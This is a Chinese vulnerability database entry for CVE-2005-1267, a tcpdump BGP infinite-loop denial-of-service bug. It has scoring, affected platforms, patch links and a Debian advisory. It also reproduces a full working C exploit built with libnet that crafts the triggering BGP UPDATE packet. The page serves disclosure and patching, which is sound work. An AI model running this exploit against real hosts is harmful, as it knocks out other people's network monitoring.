CVE-2005-1267
CVSS5.0
发布时间 :2005-06-10 00:00:00
修订时间 :2010-08-21 00:28:22
NMCOEPS    

[原文]The bgp_update_print function in tcpdump 3.x does not properly handle a -1 return value from the decode_prefix4 function, which allows remote attackers to cause a denial of service (infinite loop) via a crafted BGP packet.


[CNNVD]tcpdump BGP 'bgp_update_print'函数 拒绝服务漏洞(CNNVD-200506-099)

        tcpdump 3.x中的bgp_update_print函数存在安全漏洞,由于没有正确处理decode_prefix4函数的-1返回值,远程攻击者可借助一个特制的BGP包来触发拒绝服务攻击(无限循环)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:mandrakesoft:mandrake_linux:10.1MandrakeSoft Mandrake Linux 10.1
cpe:/o:trustix:secure_linux:2.2Trustix Secure Linux 2.2
cpe:/a:lbl:tcpdump:3.5_alpha
cpe:/a:lbl:tcpdump:3.6.3
cpe:/a:lbl:tcpdump:3.4a6
cpe:/a:lbl:tcpdump:3.8.1
cpe:/a:lbl:tcpdump:3.9.1
cpe:/a:lbl:tcpdump:3.8.2
cpe:/o:mandrakesoft:mandrake_linux:10.1::x86_64
cpe:/o:trustix:secure_linux:2.0Trustix Secure Linux 2.0
cpe:/o:trustix:secure_linux:2.1Trustix Secure Linux 2.1
cpe:/o:redhat:fedora_core:core_3.0
cpe:/a:lbl:tcpdump:3.7.1
cpe:/o:mandrakesoft:mandrake_linux:10.2::x86_64
cpe:/o:mandrakesoft:mandrake_linux:10.2MandrakeSoft Mandrake Linux 10.2
cpe:/o:gentoo:linuxGentoo Linux
cpe:/a:lbl:tcpdump:3.6.2
cpe:/a:lbl:tcpdump:3.7
cpe:/a:lbl:tcpdump:3.5.2
cpe:/o:redhat:fedora_core:core_4.0
cpe:/a:lbl:tcpdump:3.8.3
cpe:/a:lbl:tcpdump:3.9
cpe:/a:lbl:tcpdump:3.7.2
cpe:/a:lbl:tcpdump:3.4
cpe:/a:lbl:tcpdump:3.5

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:11148The bgp_update_print function in tcpdump 3.x does not properly handle a -1 return value from the decode_prefix4 function, which allows remot...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1267
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1267
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200506-099
(官方数据源) CNNVD

- 其它链接及资源

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=159208
(VENDOR_ADVISORY)  MISC  https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=159208
http://www.trustix.org/errata/2005/0028/
(VENDOR_ADVISORY)  TRUSTIX  2005-0028
http://www.redhat.com/archives/fedora-announce-list/2005-June/msg00007.html
(VENDOR_ADVISORY)  FEDORA  FEDORA-2005-406
http://secunia.com/advisories/15634/
(VENDOR_ADVISORY)  SECUNIA  15634
http://www.securityfocus.com/bid/13906
(UNKNOWN)  BID  13906
http://www.securityfocus.com/archive/1/archive/1/430292/100/0/threaded
(UNKNOWN)  FEDORA  FLSA:156139
http://www.redhat.com/support/errata/RHSA-2005-505.html
(UNKNOWN)  REDHAT  RHSA-2005:505
http://www.debian.org/security/2005/dsa-854
(UNKNOWN)  DEBIAN  DSA-854
http://secunia.com/advisories/17118
(UNKNOWN)  SECUNIA  17118

- 漏洞信息

tcpdump BGP 'bgp_update_print'函数 拒绝服务漏洞
中危 授权问题
2005-06-10 00:00:00 2005-10-20 00:00:00
远程  
        tcpdump 3.x中的bgp_update_print函数存在安全漏洞,由于没有正确处理decode_prefix4函数的-1返回值,远程攻击者可借助一个特制的BGP包来触发拒绝服务攻击(无限循环)。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        IBM AIX 5.3
        IBM IY77141
        http://www.ibm.com/support/
        LBL libpcap 0.8.3
        RedHat libpcap-0.8.3-6.FC2.3.legacy.i386.rpm
        Fedora Core 2:
        http://download.fedoralegacy.org/fedora/2/updates/i386/libpcap-0.8.3-6 .FC2.3.legacy.i386.rpm
        IPCop IPCop 1.4.1
        IPCop IPCop 1.4.6
        http://ipcop.org/modules.php?op=modload&name=Downloads&file=index&req= viewdownload&cid=3&orderby=dateD
        IPCop IPCop 1.4.8
        http://sourceforge.net/project/showfiles.php?group_id=40604&package_id =35093&release_id=351848
        IPCop IPCop 1.4.2
        IPCop IPCop 1.4.6
        http://ipcop.org/modules.php?op=modload&name=Downloads&file=index&req= viewdownload&cid=3&orderby=dateD
        IPCop IPCop 1.4.8
        http://sourceforge.net/project/showfiles.php?group_id=40604&package_id =35093&release_id=351848
        IPCop IPCop 1.4.4
        IPCop IPCop 1.4.6
        http://ipcop.org/modules.php?op=modload&name=Downloads&file=index&req= viewdownload&cid=3&orderby=dateD
        IPCop IPCop 1.4.8
        http://sourceforge.net/project/showfiles.php?group_id=40604&package_id =35093&release_id=351848
        IPCop IPCop 1.4.5
        IPCop IPCop 1.4.6
        http://ipcop.org/modules.php?op=modload&name=Downloads&file=index&req= viewdownload&cid=3&orderby=dateD
        IPCop IPCop 1.4.8
        http://sourceforge.net/project/showfiles.php?group_id=40604&package_id =35093&release_id=351848
        IPCop IPCop 1.4.6
        IPCop IPCop 1.4.8
        http://sourceforge.net/project/showfiles.php?group_id=40604&package_id =35093&release_id=351848
        MandrakeSoft Linux Mandrake 10.1
        Mandriva tcpdump-3.8.3-2.2.101mdk.i586.rpm
        Mandrakelinux 10.1:
        http://www.mandriva.com/en/download
        Mandriva tcpdump-3.8.3-2.2.101mdk.src.rpm
        Mandrakelinux 10.1:
        http://www.mandriva.com/en/download
        MandrakeSoft Linux Mandrake 10.1 x86_64
        Mandriva tcpdump-3.8.3-2.2.101mdk.src.rpm
        Mandrakelinux 10.1/X86_64:
        http://www.mandriva.com/en/download
        Mandriva tcpdump-3.8.3-2.2.101mdk.x86_64.rpm
        Mandrakelinux 10.1/X86_64:
        http://www.mandriva.com/en/download
        MandrakeSoft Linux Mandrake 10.2
        Mandriva tcpdump-3.8.3-2.2.102mdk.i586.rpm
        Mandrakelinux 10.2
        http://www.mandriva.com/en/download
        Mandriva tcpdump-3.8.3-2.2.102mdk.src.rpm
        Mandrakelinux 10.2
        http://www.mandriva.com/en/download
        MandrakeSoft Linux Mandrake 10.2 x86_64
        Mandriva tcpdump-3.8.3-2.2.102mdk.src.rpm
        Mandrakelinux 10.2/X86_64:
        http://www.mandriva.com/en/download
        Mandriva tcpdump-3.8.3-2.2.102mdk.x86_64.rpm
        Mandrakelinux 10.2/X86_64:
        http://www.mandriva.com/en/download
        LBL tcpdump 3.7.2
        RedHat arpwatch-2.1a11-7.9.4.legacy.i386.rpm
        Red Hat Linux 9:
        http://download.fedoralegacy.org/redhat/9/updates/i386/arpwatch-2.1a11 -7.9.4.legacy.i386.rpm
        RedHat arpwatch-2.1a11-8.fc1.3.legacy.i386.rpm
        Fedora Core 1:
        http://download.fedoralegacy.org/fedora/1/updates/i386/arpwatch-2.1a11 -8.fc1.3.legacy.i386.rpm
        RedHat tcpdump-3.7.2-7.9.4.legacy.i386.rpm
        Red Hat Linux 9:
        http://download.fedoralegacy.org/redhat/9/updates/i386/tcpdump-3.7.2-7 .9.4.legacy.i386.rpm
        RedHat tcpdump-3.7.2-8.fc1.3.legacy.i386.rpm
        Fedora Core 1:
        http://download.fedoralegacy.org/fedora/1/updates/i386/tcpdump-3.7.2-8 .fc1.3.legacy.i386.rpm

- 漏洞信息 (1037)

Tcpdump bgp_update_print Remote Denial of Service Exploit (EDBID:1037)
multiple dos
2005-06-09 Verified
0 simon
N/A [点击下载]
/*
* 2005-05-31: Modified by simon@FreeBSD.org to test tcpdump infinite
* loop vulnerability.
*
* libnet 1.1
* Build a BGP4 update message with what you want as payload
*
* Copyright (c) 2003 Fr d ric Raynal <pappy at security-labs organization>
* All rights reserved.
*
* Examples:
*
* empty BGP UPDATE message:
*
* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2
* libnet 1.1 packet shaping: BGP4 update + payload[raw]
* Wrote 63 byte TCP packet; check the wire.
*
* 13:44:29.216135 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]
* 16843009:16843032(23) win 32767: BGP (ttl 64, id 242, len 63)
* 0x0000 4500 003f 00f2 0000 4006 73c2 0101 0101 E..?....@.s.....
* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........
* 0x0020 5002 7fff b288 0000 0101 0101 0101 0101 P...............
* 0x0030 0101 0101 0101 0101 0017 0200 0000 00 ...............
*
*
* BGP UPDATE with Path Attributes and Unfeasible Routes Length
*
* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2 -a `printf "\x01\x02\x03"` -A 3 -W 13
* libnet 1.1 packet shaping: BGP4 update + payload[raw]
* Wrote 79 byte TCP packet; check the wire.
*
* 13:45:59.579901 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]
* 16843009:16843048(39) win 32767: BGP (ttl 64, id 242, len 79)
* 0x0000 4500 004f 00f2 0000 4006 73b2 0101 0101 E..O....@.s.....
* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........
* 0x0020 5002 7fff 199b 0000 0101 0101 0101 0101 P...............
* 0x0030 0101 0101 0101 0101 0027 0200 0d41 4141 .........'...AAA
* 0x0040 4141 4141 4141 4141 4141 0003 0102 03 AAAAAAAAAA.....
*
*
* BGP UPDATE with Reachability Information
*
* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2 -I 7
* libnet 1.1 packet shaping: BGP4 update + payload[raw]
* Wrote 70 byte TCP packet; check the wire.
*
* 13:49:02.829225 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]
* 16843009:16843039(30) win 32767: BGP (ttl 64, id 242, len 70)
* 0x0000 4500 0046 00f2 0000 4006 73bb 0101 0101 E..F....@.s.....
* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........
* 0x0020 5002 7fff e86d 0000 0101 0101 0101 0101 P....m..........
* 0x0030 0101 0101 0101 0101 001e 0200 0000 0043 ...............C
* 0x0040 4343 4343 4343 CCCCCC
*
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/

/* #if (HAVE_CONFIG_H) */
/* #include "../include/config.h" */
/* #endif */
/* #include "./libnet_test.h" */
#include <libnet.h>

void
usage(char *name);


#define set_ptr_and_size(ptr, size, val, flag) \
if (size && !ptr) \
{ \
ptr = (u_char *)malloc(size); \
if (!ptr) \
{ \
printf("memory allocation failed (%u bytes requested)\n", size); \
goto bad; \
} \
memset(ptr, val, size); \
flag = 1; \
} \
\
if (ptr && !size) \
{ \
size = strlen(ptr); \
}



int
main(int argc, char *argv[])
{
int c;
libnet_t *l;
u_long src_ip, dst_ip, length;
libnet_ptag_t t = 0;
char errbuf[LIBNET_ERRBUF_SIZE];
int pp;
u_char *payload = NULL;
u_long payload_s = 0;
u_char marker[LIBNET_BGP4_MARKER_SIZE];

u_short u_rt_l = 0;
u_char *withdraw_rt = NULL;
char flag_w = 0;
u_short attr_l = 0;
u_char *attr = NULL;
char flag_a = 0;
u_short info_l = 0;
u_char *info = NULL;
char flag_i = 0;

printf("libnet 1.1 packet shaping: BGP4 update + payload[raw]\n");

/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */

if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}

src_ip = 0;
dst_ip = 0;
memset(marker, 0x1, LIBNET_BGP4_MARKER_SIZE);
memset(marker, 0xff, LIBNET_BGP4_MARKER_SIZE);

while ((c = getopt(argc, argv, "d:s:t:m:p:w:W:a:A:i:I:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;

case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;

case 'p':
payload = optarg;
payload_s = strlen(payload);
break;

case 'w':
withdraw_rt = optarg;
break;

case 'W':
u_rt_l = atoi(optarg);
break;

case 'a':
attr = optarg;
break;

case 'A':
attr_l = atoi(optarg);
break;

case 'i':
info = optarg;
break;

case 'I':
info_l = atoi(optarg);
break;

default:
exit(EXIT_FAILURE);
}
}

if (!src_ip || !dst_ip)
{
usage(argv[0]);
goto bad;
}

set_ptr_and_size(withdraw_rt, u_rt_l, 0x41, flag_w);
set_ptr_and_size(attr, attr_l, 0x42, flag_a);
set_ptr_and_size(info, info_l, 0x43, flag_i);

/*
* 2005-05-31: Modified by simon@FreeBSD.org to test tcpdump
* infinite loop vulnerability.
*/
if (payload == NULL) {
if ((payload = malloc(16)) == NULL) {
fprintf(stderr, "Out of memory\n");
exit(1);
}
pp = 0;
payload[pp++] = 0;
payload[pp++] = 33;
payload_s = pp;
}

/*
* BGP4 update messages are "dynamic" are fields have variable size. The only
* sizes we know are those for the 2 first fields ... so we need to count them
* plus their value.
*/
length = LIBNET_BGP4_UPDATE_H + u_rt_l + attr_l + info_l + payload_s;
t = libnet_build_bgp4_update(
u_rt_l, /* Unfeasible Routes Length */
withdraw_rt, /* Withdrawn Routes */
attr_l, /* Total Path Attribute Length */
attr, /* Path Attributes */
info_l, /* Network Layer Reachability Information length */
info, /* Network Layer Reachability Information */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build BGP4 update header: %s\n", libnet_geterror(l));
goto bad;
}

length+=LIBNET_BGP4_HEADER_H;
t = libnet_build_bgp4_header(
marker, /* marker */
length, /* length */
LIBNET_BGP4_UPDATE, /* message type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build BGP4 header: %s\n", libnet_geterror(l));
goto bad;
}

length+=LIBNET_TCP_H;
t = libnet_build_tcp(
0x6666, /* source port */
179, /* destination port */
0x01010101, /* sequence number */
0x02020202, /* acknowledgement num */
TH_SYN, /* control flags */
32767, /* window size */
0, /* checksum */
0, /* urgent pointer */
length, /* TCP packet size */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}

length+=LIBNET_IPV4_H;
t = libnet_build_ipv4(
length, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}

/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte TCP packet; check the wire.\n", c);
}

if (flag_w) free(withdraw_rt);
if (flag_a) free(attr);
if (flag_i) free(info);

libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
if (flag_w) free(withdraw_rt);
if (flag_a) free(attr);
if (flag_i) free(info);

libnet_destroy(l);
return (EXIT_FAILURE);
}

void
usage(char *name)
{
fprintf(stderr,
"usage: %s -s source_ip -d destination_ip \n"
" [-m marker] [-p payload] [-S payload size]\n"
" [-w Withdrawn Routes] [-W Unfeasible Routes Length]\n"
" [-a Path Attributes] [-A Attribute Length]\n"
" [-i Reachability Information] [-I Reachability Information length]\n",
name);
}

// milw0rm.com [2005-06-09]
		

- 漏洞信息 (F40559)

Debian Linux Security Advisory 854-1 (PacketStormID:F40559)
2005-10-11 00:00:00
Debian  security.debian.org
advisory,denial of service
linux,debian
CVE-2005-1267
[点击下载]

Debian Security Advisory DSA 854-1 - Simon Nielsen discovered that the BGP dissector in tcpdump, a powerful tool for network monitoring and data acquisition, does not properly handle a -1 return value from an internal function that decodes data packets. A specially crafted BGP packet can cause a denial of service via an infinite loop.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 854-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
October 9th, 2005                       http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : tcpdump
Vulnerability  : infinite loop
Problem type   : remote
Debian-specific: no
CVE ID         : CAN-2005-1267

Simon Nielsen discovered that the BGP dissector in tcpdump, a powerful
tool for network monitoring and data acquisition, does not properly
handle a -1 return value from an internal function that decodes data
packets.  A specially crafted BGP packet can cause a denial of service
via an infinite loop.

The old stable distribution (woody) is not affected by this problem.

For the stable distribution (sarge) this problem has been fixed in
version 3.8.3-5sarge1.

We recommend that you upgrade your tcpdump package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1.dsc
      Size/MD5 checksum:      666 8a61a856f03b483ec3c74affa09e8bb5
    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1.diff.gz
      Size/MD5 checksum:    11493 b2976be14da25de46cf57a95f36739da
    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3.orig.tar.gz
      Size/MD5 checksum:   567116 30645001f4b97019677cad88d3811904

  Alpha architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_alpha.deb
      Size/MD5 checksum:   301288 afbeb130b92fe734031bd60d5819f615

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_amd64.deb
      Size/MD5 checksum:   256412 7096add9926f7db7d1a915cfe19c0629

  ARM architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_arm.deb
      Size/MD5 checksum:   250446 1846e890ce0ccf7aba4613130d7e2c2d

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_i386.deb
      Size/MD5 checksum:   238642 1b8e9a1fe69912492e5bc1285e12a1af

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_ia64.deb
      Size/MD5 checksum:   352410 59e00a553c766e41236647a85c898099

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_hppa.deb
      Size/MD5 checksum:   271478 0d1d4c3756689ba4efef69a106731c60

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_m68k.deb
      Size/MD5 checksum:   216704 a3e4d0279da8563af9da7a6981f2824a

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_mips.deb
      Size/MD5 checksum:   259316 dc533a53d2bdc886547d345073cf56a8

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_mipsel.deb
      Size/MD5 checksum:   272054 d5958967c55dc5c08dd3c3c2e546c391

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_powerpc.deb
      Size/MD5 checksum:   246300 073605199341d90268b8818cf1917f9d

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_s390.deb
      Size/MD5 checksum:   247216 50b1f28f1a86402e26f9155f4a790c39

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/t/tcpdump/tcpdump_3.8.3-5sarge1_sparc.deb
      Size/MD5 checksum:   247904 e03f3408ac1bd397cbe8bfdb2c2b4b7b


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFDSU39W5ql+IAeqTIRAioxAKCh/4Qxu22H6bRtFKNZ6Bqqk4FcZwCfXWe5
JeGk2MOuSGYocUkg3OMWkhI=
=ZO//
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息

17227
tcpdump bgp_update_print() Function Malformed BGP Protocol Data DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Availability
Exploit Public

- 漏洞描述

tcpdump contains a flaw that may allow a remote denial of service. The issue is triggered when a crafted BGP packet is parsed, causing an infinite loop, and will result in loss of availability for the service.

- 时间线

2005-06-08 Unknow
2005-06-09 Unknow

- 解决方案

Upgrade to version 3.9.3 or higher from CVS, as it has been reported to fix this vulnerability. In addition, Simon Nielsen has released a patch for some older versions.

- 相关参考

- 漏洞作者

- 漏洞信息

tcpdump BGP Decoding Routines Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 13906
Yes No
2005-06-09 12:00:00 2009-06-23 06:59:00
Discovery of this issue is credited to Simon L. Nielsen.

- 受影响的程序版本

Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Enterprise Linux 2.0
Slackware Linux 10.1
Slackware Linux 10.0
Slackware Linux 9.1
Slackware Linux 9.0
Slackware Linux 8.1
Slackware Linux -current
SGI ProPack 3.0
RedHat Linux 9.0 i386
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux ES 4
RedHat Desktop 4.0
Red Hat Fedora Core4
Red Hat Fedora Core3
Red Hat Fedora Core2
Red Hat Fedora Core1
Red Hat Enterprise Linux AS 4
Mandriva Linux Mandrake 10.2 x86_64
Mandriva Linux Mandrake 10.2
Mandriva Linux Mandrake 10.1 x86_64
Mandriva Linux Mandrake 10.1
Mandriva Linux Mandrake 10.0 AMD64
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
LBL tcpdump 3.9.1
LBL tcpdump 3.9
LBL tcpdump 3.8.3
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
+ Turbolinux Appliance Server 1.0 Workgroup Edition
+ Turbolinux Appliance Server 1.0 Hosting Edition
+ Turbolinux Appliance Server Hosting Edition 1.0
+ Turbolinux Appliance Server Workgroup Edition 1.0
+ Turbolinux Home
+ Turbolinux Turbolinux 10 F...
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
LBL tcpdump 3.8.2
LBL tcpdump 3.8.1
+ Mandriva Linux Mandrake 10.0
LBL tcpdump 3.7.2
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Turbolinux Turbolinux Advanced Server 6.0
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 6.5
+ Turbolinux Turbolinux Server 6.1
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Turbolinux Turbolinux Workstation 6.1
+ Turbolinux Turbolinux Workstation 6.0
LBL tcpdump 3.7.1
+ FreeBSD FreeBSD 4.7 -RELEASE
+ FreeBSD FreeBSD 4.7
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
+ S.u.S.E. Linux 8.1
LBL tcpdump 3.7
+ FreeBSD FreeBSD 4.6 -RELEASE
+ FreeBSD FreeBSD 4.6
+ FreeBSD FreeBSD 4.5 -STABLE
+ FreeBSD FreeBSD 4.5 -RELEASE
+ FreeBSD FreeBSD 4.5
+ FreeBSD FreeBSD 4.4 -STABLE
+ FreeBSD FreeBSD 4.4 -RELENG
+ FreeBSD FreeBSD 4.4
+ FreeBSD FreeBSD 4.3 -STABLE
+ FreeBSD FreeBSD 4.3 -RELENG
+ FreeBSD FreeBSD 4.3 -RELEASE
+ FreeBSD FreeBSD 4.3
+ FreeBSD FreeBSD 4.2 -STABLE
+ FreeBSD FreeBSD 4.2 -RELEASE
+ FreeBSD FreeBSD 4.2
LBL tcpdump 3.6.3
+ EnGarde Secure Community 2.0
+ EnGarde Secure Community 1.0.1
+ EnGarde Secure Professional 1.5
+ EnGarde Secure Professional 1.2
+ EnGarde Secure Professional 1.1
LBL tcpdump 3.6.2
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ FreeBSD FreeBSD 4.3
+ FreeBSD FreeBSD 4.2
+ FreeBSD FreeBSD 4.1.1
+ FreeBSD FreeBSD 4.1
+ FreeBSD FreeBSD 4.0
+ HP Secure OS software for Linux 1.0
+ MandrakeSoft Corporate Server 1.0.1
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ S.u.S.E. Linux 8.0
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
